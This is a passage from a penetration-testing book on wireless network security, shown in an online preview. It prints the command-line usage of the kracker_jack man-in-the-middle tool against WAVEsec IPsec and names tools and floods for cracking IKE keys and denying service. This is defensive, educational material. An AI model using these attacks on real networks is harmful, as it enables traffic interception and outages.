Free Trial

Safari Books Online is a digital library providing on-demand subscription access to thousands of learning resources.

Share this Page URL

Chapter 8. Breaking Through > The Last Resort: Wireless DoS Attacks - Pg. 127

Breaking Through 127 WAVEsec mobile IPSec implementation is exploitable with kraker_jack from the AirJack suite: arhontus:~# ./kracker_jack Kracker Jack: Wireless 802.11(b) MITM proof of concept (with a bite). Usage: ./kracker_jack -b <bssid> -v <victim mac> -C <channel number> [ -c <channel number> ] V <victims ip address> -s <server mac> -S <server ip address> [ -i <interface name> ] [ -I <interface name> ] [ -e <essid> ] n <netmask> -B <broadcast address> -a: number of disassociation frames to send (defaults to 7) -t: number of deauthentication frames to send (defaults to 0) -b:..bssid, the mac address of the access point (e.g., 00:de:ad:be:ef:00) -v: victim mac address -V: victim's ip address -s: wavesec server mac address -S: wavesec server ip address -B: network broadcast address -n: netmask address -c: channel number (1-14) that the access point is on, defaults to current -C: channel number (1-14) that we're going to move them to -i: the name of the AirJack interface to use (defaults to aj0) -I: the name of the interface to use (defaults to eth1) -e: the essid of the AP If you want to find more on how kracker_jack performs a man-in-the-middle attack against WAVEsec, check out Abaddon's Black Hat briefings presentation at bh2002.ppt. As a less specific attack against IKE, you can try IKECrack, which works against IKE phase 1 aggressive mode and MD5_HMACs only. IKECrack ( on the site) is a Perl script that takes a pcap-format file as an input and attempts a real-time brute-force of the PSK. Finally, a desperate attacker can resort to DoS attacks against IPSec, perhaps to force the system administrator to bring down the IPSec tunnel for a while to determine what went wrong. If there is mission-critical traffic on the wireless link, the attacker's hope is that it will be allowed to pass un- protected while the network administration is searching for the source of the IPSec tunnel failure. A cracker can try to stop ISAKMP for IPSec traffic with a H09_roper Ettercap plug-in (likely to work only against the aggressive IKE mode). Less specific attacks such as flooding UDP port 500 on IKE- running hosts can also be launched. There is a report ( http// 6N00G0A3FO.html) that continuous flooding of UDP 500 port on a Windows 2000 machine with large (more than 800 bytes) UDP packets can use all available CPU cycles and lock up the targeted machine. The Last Resort: Wireless DoS Attacks Multiple DoS attacks against various wireless (and even wired) protocols, security protocols inclu- ded, are mentioned elsewhere in the chapter. In many cases these attacks can be part of a sophis- ticated penetration plan and assist in social engineering, man-in-the-middle attempts, stealing, or cracking secret keys. However, a desperate attacker might launch a DoS attack to "compensate" for the effort spent on failed access attempts. Besides, wireless DoS attacks per se can be launched by the competitors, for political reasons, out of curiosity, and so forth; the situation is no different from DoS attacks on public networks such as the Internet. Unfortunately, due to the nature of the RF medium and design of the core 802.11 protocols, wireless networks cannot be protected against Layer 1 and certain Layer 2 DoS attacks. This is why, in our opinion, 802.11 links should not be used for mission-critical applications in theory. In the real world, there are cases when 802.11 is the only choice, and cases of system administrators or network designers being unaware or dismissive of the problem and going forward with the WLAN installation anyway. This is why you, as a security